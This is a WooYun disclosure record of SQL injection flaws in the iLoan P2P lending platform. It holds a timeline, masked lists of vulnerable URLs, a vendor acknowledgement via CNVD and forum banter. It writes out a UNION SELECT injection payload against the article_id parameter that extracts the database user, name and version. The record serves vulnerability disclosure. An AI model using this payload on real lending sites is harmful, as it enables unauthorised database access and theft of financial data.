当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0185250

漏洞标题:iLoan大型P2P借贷系统两处SQL注入

相关厂商:大连盈灿科技有限公司

漏洞作者: U神

提交时间:2016-03-18 16:50

修复时间:2016-06-20 16:00

公开时间:2016-06-20 16:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-18: 细节已通知厂商并且等待厂商处理中
2016-03-22: 厂商已经确认,细节仅向厂商公开
2016-03-25: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

低低调调闭关修炼

详细说明:

最近在渗透P2P站点时,第一感觉这肯定是通用,然后看看,呵呵,挺多人用的。
第一处:type_id参数盲入:
案例:

mask 区域
*****ode*****
1.https://**.**.**/articlelist.pagetype_id=08 SSL_
2.https://**.**.**/articlelist.pagetype_id=08 SSL_
3.http://**.**.**/articlelist.pagetype_id=20 _
4.http://**.**.**/articlelist.pagetype_id=04&type_flg=xwgg_
5.http://**.**.**/articlelist.pagetype_id=07_
6.http://**.**.**/articlelist.pagetype_id=07_
7.http://**.**.**/articlelist.pagetype_id=08_
8.http://**.**.**/articlelist.pagetype_id=02&type_flg=xwgg_
9.http://**.**.**/articlelist.pagetype_id=08_
10.http://**.**.**/articlelist.pagetype_id=08_
11.http://**.**.**/articlelist.pagetype_id=02&type_flg=xwgg_
12.http://**.**.**/articlelist.pagetype_id=05&type_flg_
13.http://**.**.**/articlelist.pagetype_id=01&type_flg=lcgl_
14.http://**.**.**/articlelist.pagetype_id=08_
*****de&g*****
**********
15.http://**.**.**/articlelist.pagetype_id=08_
**********
*****147ba14eb07a9e9a49f126.jpg*****
**********
*****^^*****
*****ode*****
16.http://**.**.**/articleview.pagearticle_id=269A21DB047D7DC5E050007F01007743&type_id=20&type_flg_
17.http://**.**.**/articleview.pagearticle_id=0102dd03-dc4b-11e5-9991-40f2e9d8c09a&type_id=04&type_flg=xwgg_
18.http://**.**.**/articleview.pagearticle_id=7e299055e72b11e5a8b440f2e92e2622&type_id=03_
19.http://**.**.**/articleview.pagearticle_id=b33cfe94-7e7a-11e4-a50f-40f2e99cef5a&type_id=07&type_flg_
20.http://**.**.**/articleview.pagearticleId=851eeb1d-a6f9-11e5-979e-00163e0024e9&type_id=10&type_flg=0&index=3&contentId=851eeb1d-a6f9-11e5-979e-00163e0024e9&contentType=10&type=2_
21.http://**.**.**/articleview.pagearticle_id=c4c39d5d-85c3-11e4-912a-94de80cbc04c&type_id=06&type_flg=lcgl_
22.http://**.**.**/articleview.pagearticleId=88399c9c-b4db-11e5-884f-1051721b3c39&type_id=10&type_flg=0&index=3&contentId=88399c9c-b4db-11e5-884f-1051721b3c39&contentType=10&type=2_
23.http://**.**.**/articleview.pagearticle_id=01833ea8-2549-11e5-9a92-00163e000e7b&type_id=08&type_flg_
24.http://**.**.**/articleview.pagearticle_id=89944d3b-7ba4-11e5-9838-1051721d3b60&type_id=01&type_flg=lcgl_
25.http://**.**.**/articleview.pagearticle_id=a831146b-e697-11e5-ba53-288023a0e8b4&type_id=08&type_flg_
*****cod*****


mask 区域
1.http://**.**.**/

articleview.page?article_id=-1' union all select null,concat(user(),0x7e,database(),0x7e,@@version),null,null,null%23&type_id=01&type_flg=lcgl

a2.jpg

漏洞证明:

上面就是证明

修复方案:

版权声明:转载请注明来源 U神@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-03-22 15:56

厂商回复:

CNVD确认所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-03-18 16:56 | DNS ( 普通白帽子 | Rank:803 漏洞数:85 | root@qisec.com)

    @king7

  2. 2016-03-18 17:29 | king7 ( 普通白帽子 | Rank:1887 漏洞数:252 | 早知如此绊人心,何如当初莫相识。)

    @DNS 我以为你死了

  3. 2016-03-18 19:51 | j14n ( 普通白帽子 | Rank:2110 漏洞数:376 | weibo那个j14n不是我。)

    为什么后面带邮箱?

  4. 2016-03-22 16:40 | backtrack丶yao ( 普通白帽子 | Rank:298 漏洞数:110 )

    这个吊

  5. 2016-03-30 09:54 | DNS ( 普通白帽子 | Rank:803 漏洞数:85 | root@qisec.com)

    鸡鸡 是你